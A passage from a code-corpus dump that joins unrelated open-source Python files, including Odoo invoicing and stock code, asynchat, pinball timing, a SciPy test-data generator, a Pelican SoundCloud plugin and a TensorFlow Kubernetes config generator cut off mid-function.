if self.env.context.get('force_date'):
invoice_date = self.invoice_date
else:
invoice_date = self.compute_date_birthday_invoice(
contract.child_id.birthdate,
self.invoice_date)
begin_year = fields.Date.from_string(
self.invoice_date).replace(month=1, day=1)
end_year = begin_year.replace(month=12, day=31)
# If a gift was already made for the year, abort
invoice_line_ids = self.env[
'account.invoice.line'].search([
('product_id', '=', self.product_id.id),
('due_date', '>=', fields.Date.to_string(
begin_year)),
('due_date', '<=', fields.Date.to_string(
end_year)),
('contract_id', '=', contract.id),
('state', '!=', 'cancel')])
if invoice_line_ids and not self.force:
continue
else:
invoice_date = self.invoice_date
inv_data = self._setup_invoice(contract, invoice_date)
invoice = self.env['account.invoice'].create(inv_data)
invoice.action_invoice_open()
# Commit at each invoice creation. This does not break
# the state
if not test_mode:
self.env.cr.commit() # pylint: disable=invalid-commit
invoice_ids.append(invoice.id)
return {
'name': _('Generated Invoices'),
'view_mode': 'tree,form',
'view_type': 'form',
'res_model': 'account.invoice',
'domain': [('id', 'in', invoice_ids)],
'context': {'form_view_ref': 'account.invoice_form'},
'type': 'ir.actions.act_window',
}
@api.multi
def _setup_invoice(self, contract, invoice_date):
journal_id = self.env['account.journal'].search([
('type', '=', 'sale'),
('company_id', '=', contract.company_id.id)
], limit=1).id
return {
'type': 'out_invoice',
'partner_id': contract.gift_partner_id.id,
'journal_id': journal_id,
'date_invoice': invoice_date,
'payment_mode_id': contract.payment_mode_id.id,
'recurring_invoicer_id': self.env.context.get(
'recurring_invoicer_id', False),
'invoice_line_ids': [(0, 0, self.with_context(
journal_id=journal_id)._setup_invoice_line(contract))]
}
@api.multi
def _setup_invoice_line(self, contract):
self.ensure_one()
product = self.product_id
account = product.property_account_income_id.id or self.env[
'account.invoice.line']._default_account()
inv_line_data = {
'name': self.description,
'account_id': account,
'price_unit': self.amount,
'quantity': 1,
'product_id': product.id,
'contract_id': contract.id,
}
# Define analytic journal
analytic = self.env['account.analytic.default'].account_get(
product.id, contract.partner_id.id, date=fields.Date.today())
if analytic and analytic.analytic_id:
inv_line_data['account_analytic_id'] = analytic.analytic_id.id
return inv_line_data
@api.model
def compute_date_birthday_invoice(self, child_birthdate, payment_date):
"""Set date of invoice two months before child's birthdate"""
inv_date = fields.Date.from_string(payment_date)
birthdate = fields.Date.from_string(child_birthdate)
new_date = inv_date
if birthdate.month >= inv_date.month + 2:
new_date = inv_date.replace(day=28, month=birthdate.month - 2)
elif birthdate.month + 3 < inv_date.month:
new_date = birthdate.replace(
day=28, year=inv_date.year + 1) + relativedelta(months=-2)
new_date = max(new_date, inv_date)
return fields.Date.to_string(new_date)
| agpl-3.0 |
incaser/odoo-odoo | addons/stock/tests/test_resupply.py | 214 | 2457 | # -*- coding: utf-8 -*-
from openerp.addons.stock.tests.common import TestStockCommon
from openerp.tools import mute_logger, float_round
class TestResupply(TestStockCommon):
def setUp(self):
super(TestResupply, self).setUp()
self.Warehouse = self.env['stock.warehouse']
# create 2 WH, BIG and SMALL
# SMALL resupplies from BIG
self.bigwh = self.Warehouse.create({'name': 'BIG', 'code': 'B'})
self.smallwh = self.Warehouse.create({'name': 'SMALL', 'code': 'S',
'default_resupply_wh_id': self.bigwh.id,
'resupply_wh_ids': [(6, 0, [self.bigwh.id])],
})
# minimum stock rule for Product A on SMALL
Orderpoint = self.env['stock.warehouse.orderpoint']
Orderpoint.create({'warehouse_id': self.smallwh.id,
'location_id': self.smallwh.lot_stock_id.id,
'product_id': self.productA.id,
'product_min_qty': 100,
'product_max_qty': 200,
'product_uom': self.uom_unit.id,
})
# create some stock on BIG
Wiz = self.env['stock.change.product.qty']
wiz = Wiz.create({'product_id': self.productA.id,
'new_quantity': 1000,
'location_id': self.bigwh.lot_stock_id.id,
})
wiz.change_product_qty()
def test_resupply_from_wh(self):
sched = self.env['procurement.order']
sched.run_scheduler()
# we generated 2 procurements for product A: one on small wh and the
# other one on the transit location
procs = sched.search([('product_id', '=', self.productA.id)])
self.assertEqual(len(procs), 2)
proc1 = sched.search([('product_id', '=', self.productA.id),
('warehouse_id', '=', self.smallwh.id)])
self.assertEqual(proc1.state, 'running')
proc2 = sched.search([('product_id', '=', self.productA.id),
('warehouse_id', '=', self.bigwh.id)])
self.assertEqual(proc2.location_id.usage, 'transit')
self.assertNotEqual(proc2.state, 'exception')
proc2.run()
self.assertEqual(proc2.state, 'running')
self.assertTrue(proc2.rule_id)
| agpl-3.0 |
2uller/LotF | App/Lib/asynchat.py | 63 | 11716 | # -*- Mode: Python; tab-width: 4 -*-
# Id: asynchat.py,v 2.26 2000/09/07 22:29:26 rushing Exp
# Author: Sam Rushing <rushing@nightmare.com>
# ======================================================================
# Copyright 1996 by Sam Rushing
#
# All Rights Reserved
#
# Permission to use, copy, modify, and distribute this software and
# its documentation for any purpose and without fee is hereby
# granted, provided that the above copyright notice appear in all
# copies and that both that copyright notice and this permission
# notice appear in supporting documentation, and that the name of Sam
# Rushing not be used in advertising or publicity pertaining to
# distribution of the software without specific, written prior
# permission.
#
# SAM RUSHING DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE,
# INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS, IN
# NO EVENT SHALL SAM RUSHING BE LIABLE FOR ANY SPECIAL, INDIRECT OR
# CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS
# OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT,
# NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN
# CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
# ======================================================================
r"""A class supporting chat-style (command/response) protocols.
This class adds support for 'chat' style protocols - where one side
sends a 'command', and the other sends a response (examples would be
the common internet protocols - smtp, nntp, ftp, etc..).
The handle_read() method looks at the input stream for the current
'terminator' (usually '\r\n' for single-line responses, '\r\n.\r\n'
for multi-line output), calling self.found_terminator() on its
receipt.
for example:
Say you build an async nntp client using this class. At the start
of the connection, you'll have self.terminator set to '\r\n', in
order to process the single-line greeting. Just before issuing a
'LIST' command you'll set it to '\r\n.\r\n'. The output of the LIST
command will be accumulated (using your own 'collect_incoming_data'
method) up to the terminator, and then control will be returned to
you - by calling your self.found_terminator() method.
"""
import socket
import asyncore
from collections import deque
from sys import py3kwarning
from warnings import filterwarnings, catch_warnings
class async_chat (asyncore.dispatcher):
"""This is an abstract class. You must derive from this class, and add
the two methods collect_incoming_data() and found_terminator()"""
# these are overridable defaults
ac_in_buffer_size = 4096
ac_out_buffer_size = 4096
def __init__ (self, sock=None, map=None):
# for string terminator matching
self.ac_in_buffer = ''
# we use a list here rather than cStringIO for a few reasons...
# del lst[:] is faster than sio.truncate(0)
# lst = [] is faster than sio.truncate(0)
# cStringIO will be gaining unicode support in py3k, which
# will negatively affect the performance of bytes compared to
# a ''.join() equivalent
self.incoming = []
# we toss the use of the "simple producer" and replace it with
# a pure deque, which the original fifo was a wrapping of
self.producer_fifo = deque()
asyncore.dispatcher.__init__ (self, sock, map)
def collect_incoming_data(self, data):
raise NotImplementedError("must be implemented in subclass")
def _collect_incoming_data(self, data):
self.incoming.append(data)
def _get_data(self):
d = ''.join(self.incoming)
del self.incoming[:]
return d
def found_terminator(self):
raise NotImplementedError("must be implemented in subclass")
def set_terminator (self, term):
"Set the input delimiter. Can be a fixed string of any length, an integer, or None"
self.terminator = term
def get_terminator (self):
return self.terminator
# grab some more data from the socket,
# throw it to the collector method,
# check for the terminator,
# if found, transition to the next state.
def handle_read (self):
try:
data = self.recv (self.ac_in_buffer_size)
except socket.error, why:
self.handle_error()
return
self.ac_in_buffer = self.ac_in_buffer + data
# Continue to search for self.terminator in self.ac_in_buffer,
# while calling self.collect_incoming_data. The while loop
# is necessary because we might read several data+terminator
# combos with a single recv(4096).
while self.ac_in_buffer:
lb = len(self.ac_in_buffer)
terminator = self.get_terminator()
if not terminator:
# no terminator, collect it all
self.collect_incoming_data (self.ac_in_buffer)
self.ac_in_buffer = ''
elif isinstance(terminator, int) or isinstance(terminator, long):
# numeric terminator
n = terminator
if lb < n:
self.collect_incoming_data (self.ac_in_buffer)
self.ac_in_buffer = ''
self.terminator = self.terminator - lb
else:
self.collect_incoming_data (self.ac_in_buffer[:n])
self.ac_in_buffer = self.ac_in_buffer[n:]
self.terminator = 0
self.found_terminator()
else:
# 3 cases:
# 1) end of buffer matches terminator exactly:
# collect data, transition
# 2) end of buffer matches some prefix:
# collect data to the prefix
# 3) end of buffer does not match any prefix:
# collect data
terminator_len = len(terminator)
index = self.ac_in_buffer.find(terminator)
if index != -1:
# we found the terminator
if index > 0:
# don't bother reporting the empty string (source of subtle bugs)
self.collect_incoming_data (self.ac_in_buffer[:index])
self.ac_in_buffer = self.ac_in_buffer[index+terminator_len:]
# This does the Right Thing if the terminator is changed here.
self.found_terminator()
else:
# check for a prefix of the terminator
index = find_prefix_at_end (self.ac_in_buffer, terminator)
if index:
if index != lb:
# we found a prefix, collect up to the prefix
self.collect_incoming_data (self.ac_in_buffer[:-index])
self.ac_in_buffer = self.ac_in_buffer[-index:]
break
else:
# no prefix, collect it all
self.collect_incoming_data (self.ac_in_buffer)
self.ac_in_buffer = ''
def handle_write (self):
self.initiate_send()
def handle_close (self):
self.close()
def push (self, data):
sabs = self.ac_out_buffer_size
if len(data) > sabs:
for i in xrange(0, len(data), sabs):
self.producer_fifo.append(data[i:i+sabs])
else:
self.producer_fifo.append(data)
self.initiate_send()
def push_with_producer (self, producer):
self.producer_fifo.append(producer)
self.initiate_send()
def readable (self):
"predicate for inclusion in the readable for select()"
# cannot use the old predicate, it violates the claim of the
# set_terminator method.
# return (len(self.ac_in_buffer) <= self.ac_in_buffer_size)
return 1
def writable (self):
"predicate for inclusion in the writable for select()"
return self.producer_fifo or (not self.connected)
def close_when_done (self):
"automatically close this channel once the outgoing queue is empty"
self.producer_fifo.append(None)
def initiate_send(self):
while self.producer_fifo and self.connected:
first = self.producer_fifo[0]
# handle empty string/buffer or None entry
if not first:
del self.producer_fifo[0]
if first is None:
self.handle_close()
return
# handle classic producer behavior
obs = self.ac_out_buffer_size
try:
with catch_warnings():
if py3kwarning:
filterwarnings("ignore", ".*buffer", DeprecationWarning)
data = buffer(first, 0, obs)
except TypeError:
data = first.more()
if data:
self.producer_fifo.appendleft(data)
else:
del self.producer_fifo[0]
continue
# send the data
try:
num_sent = self.send(data)
except socket.error:
self.handle_error()
return
if num_sent:
if num_sent < len(data) or obs < len(first):
self.producer_fifo[0] = first[num_sent:]
else:
del self.producer_fifo[0]
# we tried to send some actual data
return
def discard_buffers (self):
# Emergencies only!
self.ac_in_buffer = ''
del self.incoming[:]
self.producer_fifo.clear()
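# Illustrative sketch (not part of the upstream asyncore distribution): a
# minimal subclass wiring together set_terminator(), collect_incoming_data()
# and found_terminator() as described in the module docstring above. The class
# name and echo behaviour are examples only.
class _example_line_channel(async_chat):
    """Example only: collect CRLF-terminated lines and echo them back."""
    def __init__(self, sock=None, map=None):
        async_chat.__init__(self, sock, map)
        self.set_terminator('\r\n')
    def collect_incoming_data(self, data):
        self._collect_incoming_data(data)
    def found_terminator(self):
        line = self._get_data()
        self.push(line + '\r\n')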
class simple_producer:
def __init__ (self, data, buffer_size=512):
self.data = data
self.buffer_size = buffer_size
def more (self):
if len (self.data) > self.buffer_size:
result = self.data[:self.buffer_size]
self.data = self.data[self.buffer_size:]
return result
else:
result = self.data
self.data = ''
return result
class fifo:
def __init__ (self, list=None):
if not list:
self.list = deque()
else:
self.list = deque(list)
def __len__ (self):
return len(self.list)
def is_empty (self):
return not self.list
def first (self):
return self.list[0]
def push (self, data):
self.list.append(data)
def pop (self):
if self.list:
return (1, self.list.popleft())
else:
return (0, None)
# Given 'haystack', see if any prefix of 'needle' is at its end. This
# assumes an exact match has already been checked. Return the number of
# characters matched.
# for example:
# f_p_a_e ("qwerty\r", "\r\n") => 1
# f_p_a_e ("qwertydkjf", "\r\n") => 0
# f_p_a_e ("qwerty\r\n", "\r\n") => <undefined>
# this could maybe be made faster with a computed regex?
# [answer: no; circa Python-2.0, Jan 2001]
# new python: 28961/s
# old python: 18307/s
# re: 12820/s
# regex: 14035/s
def find_prefix_at_end (haystack, needle):
l = len(needle) - 1
while l and not haystack.endswith(needle[:l]):
l -= 1
return l
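# Example sketch (added for illustration, not in the upstream module): the
# worked cases from the comment above, in executable form.
def _find_prefix_at_end_examples():
    assert find_prefix_at_end("qwerty\r", "\r\n") == 1
    assert find_prefix_at_end("qwertydkjf", "\r\n") == 0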
| gpl-2.0 |
qcapen/mpf | mpf/system/timing.py | 1 | 8236 | """Contains Timing and Timer classes"""
# timing.py
# Mission Pinball Framework
# Written by Brian Madden & Gabe Knuth
# Released under the MIT License. (See license info at the end of this file.)
# Documentation and more info at http://missionpinball.com/mpf
import logging
import time
class Timing(object):
"""System timing object.
This object manages timing for the whole system. Only one of these
objects should exist. By convention it is called 'timing'.
The timing keeps the current time in 'time' and a set of Timer
objects.
"""
HZ = None
"""Number of ticks per second."""
secs_per_tick = None
"""Float of how many seconds one tick takes."""
ms_per_tick = None
"""Float of how many milliseconds one tick takes."""
tick = 0
"""Current tick number of the machine. Starts at 0 when MPF boots and counts
up forever until MPF ends. Used instead of real-world time for all MPF time-
related functions.
"""
def __init__(self, machine):
self.timers = set()
self.timers_to_remove = set()
self.timers_to_add = set()
self.log = logging.getLogger("Timing")
self.machine = machine
try:
Timing.HZ = self.machine.config['timing']['hz']
except KeyError:
Timing.HZ = 30
self.log.debug("Configuring system Timing for %sHz", Timing.HZ)
Timing.secs_per_tick = 1 / float(Timing.HZ)
Timing.ms_per_tick = 1000 * Timing.secs_per_tick
def add(self, timer):
timer.wakeup = time.time() + timer.frequency
self.timers_to_add.add(timer)
def remove(self, timer):
self.timers_to_remove.add(timer)
def timer_tick(self):
global tick
Timing.tick += 1
for timer in self.timers:
if timer.wakeup and timer.wakeup <= time.time():
timer.call()
if timer.frequency:
timer.wakeup += timer.frequency
else:
timer.wakeup = None
while self.timers_to_remove:
timer = self.timers_to_remove.pop()
if timer in self.timers:
self.timers.remove(timer)
for timer in self.timers_to_add:
self.timers.add(timer)
self.timers_to_add = set()
@staticmethod
def secs(s):
return s / 1000.0
@staticmethod
def string_to_secs(time_string):
"""Decodes a string of real-world time into an float of seconds.
See 'string_to_ms' for a description of the time string.
"""
return Timing.string_to_ms(time_string) / 1000.0
@staticmethod
def string_to_ms(time_string):
"""Decodes a string of real-world time into an int of milliseconds.
Example inputs:
200ms
2s
None
If no "s" or "ms" is provided, this method assumes "milliseconds."
If time is 'None' or a string of 'None', this method returns 0.
Returns:
Integer. The examples listed above return 200, 2000 and 0,
respectively
"""
time_string = str(time_string).upper()
if time_string.endswith('MS') or time_string.endswith('MSEC'):
time_string = ''.join(i for i in time_string if not i.isalpha())
return int(time_string)
elif 'D' in time_string:
time_string = ''.join(i for i in time_string if not i.isalpha())
return int(float(time_string) * 86400 * 1000)
elif 'H' in time_string:
time_string = ''.join(i for i in time_string if not i.isalpha())
return int(float(time_string) * 3600 * 1000)
elif 'M' in time_string:
time_string = ''.join(i for i in time_string if not i.isalpha())
return int(float(time_string) * 60 * 1000)
elif time_string.endswith('S') or time_string.endswith('SEC'):
time_string = ''.join(i for i in time_string if not i.isalpha())
return int(float(time_string) * 1000)
elif not time_string or time_string == 'NONE':
return 0
else:
time_string = ''.join(i for i in time_string if not i.isalpha())
return int(time_string)
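    # Illustrative sketch (added for clarity, not in the original file): the
    # parsing rules documented above, in executable form.
    @staticmethod
    def _string_to_ms_examples():
        """Example only."""
        assert Timing.string_to_ms('200ms') == 200
        assert Timing.string_to_ms('2s') == 2000
        assert Timing.string_to_ms(None) == 0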
@staticmethod
def string_to_ticks(time_string):
"""Converts a string of real-world time into a float of how many machine
ticks correspond to that amount of time.
See 'string_to_ms' for a description of the time string.
"""
return Timing.string_to_ms(time_string) / Timing.ms_per_tick
@staticmethod
def int_to_pwm(ratio, length):
"""Converts a decimal between 0 and 1 to a pwm mask of whatever length
you want.
For example, an input ratio of .5 with a result length of 8 returns
10101010. And input ratio of .7 with a result length of 32 returns
11011011101101101101110110110110.
Another way to think about this is this method converts a decimal
percentage into the corresponding pwm mask.
Args:
ratio (float): A value between 0 and 1 that you want to convert.
length (int): How many digits you want in your result.
"""
whole_num = 0 # tracks our whole number
output = 0 # our output mask
count = 0 # our current count
for _i in range(length):
count += ratio
if int(count) > whole_num:
output |= 1
whole_num += 1
output <<= 1
return output
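    # Illustrative sketch (not part of the original MPF source): the first
    # docstring example above, in executable form.
    @staticmethod
    def _int_to_pwm_example():
        """Example only: a 50% ratio over 8 bits yields the mask 10101010."""
        assert Timing.int_to_pwm(0.5, 8) == 0b10101010  # == 170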
    def pwm_ms_to_byte_int(self, pwm_on, pwm_off):
"""Converts a pwm_on / pwm_off ms times to a single byte pwm mask.
"""
total_ms = pwm_on + pwm_off
if total_ms % 2 or total_ms > 8:
# todo dunno what to do here.
self.log.error("pwm_ms_to_byte error: pwm_on + pwm_off total must "
"be 1, 2, 4, or 8.")
quit()
if not pwm_on:
return 0
elif not pwm_off:
return 255
else:
return int(pwm_on / float(pwm_on + pwm_off) * 255)
class Timer(object):
"""Periodic timer object.
A timer defines a callable plus a frequency (in sec) at which it should be
called. The frequency can be set to None so that the timer is not enabled,
but it still exists.
Args:
callback (method): The method you want called each time this timer is
fired.
args (tuple): Arguments you want to pass to the callback.
frequency (int or float): How often, in seconds, you want this timer
to be called.
"""
def __init__(self, callback, args=tuple(), frequency=None):
self.callback = callback
self.args = args
self.wakeup = None
self.frequency = frequency
self.log = logging.getLogger("Timer")
self.log.debug('Creating timer for callback "%s" every %ss',
self.callback.__name__, self.frequency)
def call(self):
self.callback(*self.args)
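# Illustrative usage sketch (not part of the original module): registering a
# periodic Timer with the Timing object, as described in the docstrings above.
# The callback and frequency are examples only.
def _timer_usage_example(timing):
    """Example only: fire a no-op callback once per second."""
    def _on_second():
        pass  # placeholder for real work
    timing.add(Timer(_on_second, frequency=1.0))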
# The MIT License (MIT)
# Copyright (c) 2013-2015 Brian Madden and Gabe Knuth
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
| mit |
jsilter/scipy | scipy/fftpack/tests/gen_fftw_ref.py | 73 | 1533 | from __future__ import division, print_function, absolute_import
from subprocess import Popen, PIPE, STDOUT
import numpy as np
SZ = [2, 3, 4, 8, 12, 15, 16, 17, 32, 64, 128, 256, 512, 1024]
def gen_data(dt):
arrays = {}
if dt == np.double:
pg = './fftw_double'
elif dt == np.float32:
pg = './fftw_single'
else:
raise ValueError("unknown: %s" % dt)
# Generate test data using FFTW for reference
for type in [1, 2, 3, 4, 5, 6, 7, 8]:
arrays[type] = {}
for sz in SZ:
a = Popen([pg, str(type), str(sz)], stdout=PIPE, stderr=STDOUT)
st = [i.strip() for i in a.stdout.readlines()]
arrays[type][sz] = np.fromstring(",".join(st), sep=',', dtype=dt)
return arrays
# generate single precision data
data = gen_data(np.float32)
filename = 'fftw_single_ref'
# Save ref data into npz format
d = {}
d['sizes'] = SZ
for type in [1, 2, 3, 4]:
for sz in SZ:
d['dct_%d_%d' % (type, sz)] = data[type][sz]
d['sizes'] = SZ
for type in [5, 6, 7, 8]:
for sz in SZ:
d['dst_%d_%d' % (type-4, sz)] = data[type][sz]
np.savez(filename, **d)
# generate double precision data
data = gen_data(np.float64)
filename = 'fftw_double_ref'
# Save ref data into npz format
d = {}
d['sizes'] = SZ
for type in [1, 2, 3, 4]:
for sz in SZ:
d['dct_%d_%d' % (type, sz)] = data[type][sz]
d['sizes'] = SZ
for type in [5, 6, 7, 8]:
for sz in SZ:
d['dst_%d_%d' % (type-4, sz)] = data[type][sz]
np.savez(filename, **d)
| bsd-3-clause |
kdpenner/google-python-exercises | basic/list2.py | 1 | 2269 | #!/usr/bin/python -tt
# Copyright 2010 Google Inc.
# Licensed under the Apache License, Version 2.0
# http://www.apache.org/licenses/LICENSE-2.0
# Google's Python Class
# http://code.google.com/edu/languages/google-python-class/
# Additional basic list exercises
# D. Given a list of numbers, return a list where
# all adjacent == elements have been reduced to a single element,
# so [1, 2, 2, 3] returns [1, 2, 3]. You may create a new list or
# modify the passed in list.
def remove_adjacent(nums):
list_del = []
for num in nums:
if len(list_del) == 0 or num != list_del[-1]:
list_del.append(num)
return list_del
# E. Given two lists sorted in increasing order, create and return a merged
# list of all the elements in sorted order. You may modify the passed in lists.
# Ideally, the solution should work in "linear" time, making a single
# pass of both lists.
def linear_merge(list1, list2):
list3 = list1 + list2
return sorted(list3)
# Note: the solution above is concise, but sorted() on the concatenated list
# runs in O(n log n) with the standard python list implementation, so
# the above is not strictly linear time.
# An alternate approach uses pop(-1) to remove the endmost elements
# from each list, building a solution list which is backwards.
# Then use reversed() to put the result back in the correct order. That
# solution works in linear time, but is more ugly.
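# A sketch of that alternate approach, added for illustration (the name
# linear_merge_alt and this implementation are not part of the original
# exercise). It pops from the ends of the passed-in lists, so it mutates them.
def linear_merge_alt(list1, list2):
  merged = []
  # Take the larger of the two tail elements each time; pop() from the end is O(1).
  while list1 and list2:
    if list1[-1] >= list2[-1]:
      merged.append(list1.pop())
    else:
      merged.append(list2.pop())
  # Whatever remains is already sorted and no larger than anything collected.
  merged.extend(reversed(list1 or list2))
  # merged was built largest-first, so flip it into increasing order.
  merged.reverse()
  return merged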
# Simple provided test() function used in main() to print
# what each function returns vs. what it's supposed to return.
def test(got, expected):
if got == expected:
prefix = ' OK '
else:
prefix = ' X '
print '%s got: %s expected: %s' % (prefix, repr(got), repr(expected))
# Calls the above functions with interesting inputs.
def main():
print 'remove_adjacent'
test(remove_adjacent([1, 2, 2, 3]), [1, 2, 3])
test(remove_adjacent([2, 2, 3, 3, 3]), [2, 3])
test(remove_adjacent([]), [])
print
print 'linear_merge'
test(linear_merge(['aa', 'xx', 'zz'], ['bb', 'cc']),
['aa', 'bb', 'cc', 'xx', 'zz'])
test(linear_merge(['aa', 'xx'], ['bb', 'cc', 'zz']),
['aa', 'bb', 'cc', 'xx', 'zz'])
test(linear_merge(['aa', 'aa'], ['aa', 'bb', 'bb']),
['aa', 'aa', 'aa', 'bb', 'bb'])
if __name__ == '__main__':
main()
| apache-2.0 |
lgscofield/odoo | addons/account_bank_statement_extensions/report/__init__.py | 415 | 1128 | # -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
#
# Copyright (c) 2011 Noviat nv/sa (www.noviat.be). All rights reserved.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import bank_statement_balance_report
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
s40523247/2016fallcp_hw | plugin/liquid_tags/soundcloud.py | 26 | 1582 | """
Soundcloud Tag
--------------
This implements a Liquid-style soundcloud tag for Pelican.
It asks the official SoundCloud oEmbed API for the widget HTML code.
Syntax
------
`{% soundcloud track_url %}`
Example
-------
`{% soundcloud https://soundcloud.com/luftmentsh/hakotel %}`
Output
------
`<iframe width="100%" height="400" scrolling="no" frameborder="no" src="https://w.soundcloud.com/player/?visual=true&url=http%3A%2F%2Fapi.soundcloud.com%2Ftracks%2F33875102&show_artwork=true"></iframe>`
"""
from .mdx_liquid_tags import LiquidTags
import re
import json
try:
from urllib.request import urlopen
except ImportError:
from urllib import urlopen
SYNTAX = '{% soundcloud track_url %}'
PARSE_SYNTAX = re.compile(r'(?P<track_url>https?://soundcloud.com/[\S]+)')
def get_widget(track_url):
r = urlopen(
'http://soundcloud.com/oembed',
data='format=json&url={}'.format(track_url).encode('utf-8'))
return json.loads(r.read().decode('utf-8'))['html']
def match_it(markup):
match = PARSE_SYNTAX.search(markup)
if match:
return match.groupdict()
else:
raise ValueError('Error processing input. '
'Expected syntax: {}'.format(SYNTAX))
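# For example (hypothetical track URL), match_it('https://soundcloud.com/artist/track')
# returns {'track_url': 'https://soundcloud.com/artist/track'}; markup without a
# SoundCloud URL raises ValueError with the expected-syntax message above.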
@LiquidTags.register('soundcloud')
def soundcloud(preprocessor, tag, markup):
track_url = match_it(markup)['track_url']
return get_widget(track_url)
# ---------------------------------------------------
# This import allows image tag to be a Pelican plugin
from liquid_tags import register
| agpl-3.0 |
ibab/tensorflow | tensorflow/tools/dist_test/scripts/k8s_tensorflow.py | 9 | 7257 | #!/usr/bin/python
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Generates YAML configuration files for distributed Tensorflow workers.
The workers will be run in a Kubernetes (k8s) container cluster.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import sys
# Note: It is intentional that we do not import tensorflow in this script. The
# machine that launches a TensorFlow k8s cluster does not have to have the
# Python package of TensorFlow installed on it.
DEFAULT_DOCKER_IMAGE = 'tensorflow/tf_grpc_test_server'
DEFAULT_PORT = 2222
# TODO(cais): Consider adding resource requests/limits to the pods.
WORKER_RC = (
"""apiVersion: v1
kind: ReplicationController
metadata:
name: tf-worker{worker_id}
spec:
replicas: 1
template:
metadata:
labels:
tf-worker: "{worker_id}"
spec:
containers:
- name: tf-worker{worker_id}
image: {docker_image}
args:
- --cluster_spec={cluster_spec}
- --job_name=worker
- --task_id={worker_id}
ports:
- containerPort: {port}
""")
WORKER_SVC = (
"""apiVersion: v1
kind: Service
metadata:
name: tf-worker{worker_id}
labels:
tf-worker: "{worker_id}"
spec:
ports:
- port: {port}
targetPort: {port}
selector:
tf-worker: "{worker_id}"
""")
WORKER_LB_SVC = (
"""apiVersion: v1
kind: Service
metadata:
name: tf-worker{worker_id}
labels:
tf-worker: "{worker_id}"
spec:
type: LoadBalancer
ports:
- port: {port}
selector:
tf-worker: "{worker_id}"
""")
PARAM_SERVER_RC = (
"""apiVersion: v1
kind: ReplicationController
metadata:
name: tf-ps{param_server_id}
spec:
replicas: 1
template:
metadata:
labels:
tf-ps: "{param_server_id}"
spec:
containers:
- name: tf-ps{param_server_id}
image: {docker_image}
args:
- --cluster_spec={cluster_spec}
- --job_name=ps
- --task_id={param_server_id}
ports:
- containerPort: {port}
""")
PARAM_SERVER_SVC = (
"""apiVersion: v1
kind: Service
metadata:
name: tf-ps{param_server_id}
labels:
tf-ps: "{param_server_id}"
spec:
ports:
- port: {port}
selector:
tf-ps: "{param_server_id}"
""")
def main():
"""Do arg parsing."""
parser = argparse.ArgumentParser()
parser.add_argument('--num_workers',
type=int,
default=2,
help='How many worker pods to run')
parser.add_argument('--num_parameter_servers',
type=int,
default=1,
                      help='How many parameter server pods to run')
parser.add_argument('--grpc_port',
type=int,
default=DEFAULT_PORT,
help='GRPC server port (Default: %d)' % DEFAULT_PORT)
parser.add_argument('--request_load_balancer',
type=bool,
default=False,
help='To request worker0 to be exposed on a public IP '
'address via an external load balancer, enabling you to '
'run client processes from outside the cluster')
parser.add_argument('--docker_image',
type=str,
default=DEFAULT_DOCKER_IMAGE,
help='Override default docker image for the TensorFlow '
'GRPC server')
args = parser.parse_args()
if args.num_workers <= 0:
sys.stderr.write('--num_workers must be greater than 0; received %d\n'
% args.num_workers)
sys.exit(1)
if args.num_parameter_servers <= 0:
sys.stderr.write(
'--num_parameter_servers must be greater than 0; received %d\n'
% args.num_parameter_servers)
sys.exit(1)
# Generate contents of yaml config
yaml_config = GenerateConfig(args.num_workers,
args.num_parameter_servers,
args.grpc_port,
args.request_load_balancer,
args.docker_image)
print(yaml_config) # pylint: disable=superfluous-parens
def GenerateConfig(num_workers,
num_param_servers,
port,
request_load_balancer,
docker_image):
"""Generate configuration strings."""
config = ''
for worker in range(num_workers):
config += WORKER_RC.format(
port=port,
worker_id=worker,
docker_image=docker_image,
cluster_spec=WorkerClusterSpecString(num_workers,
num_param_servers,
port))
config += '---\n'
if request_load_balancer:
config += WORKER_LB_SVC.format(port=port,
worker_id=worker)
else:
config += WORKER_SVC.format(port=port,
worker_id=worker)
config += '---\n'
for param_server in range(num_param_servers):
config += PARAM_SERVER_RC.format(
port=port,
param_server_id=param_server,
docker_image=docker_image,
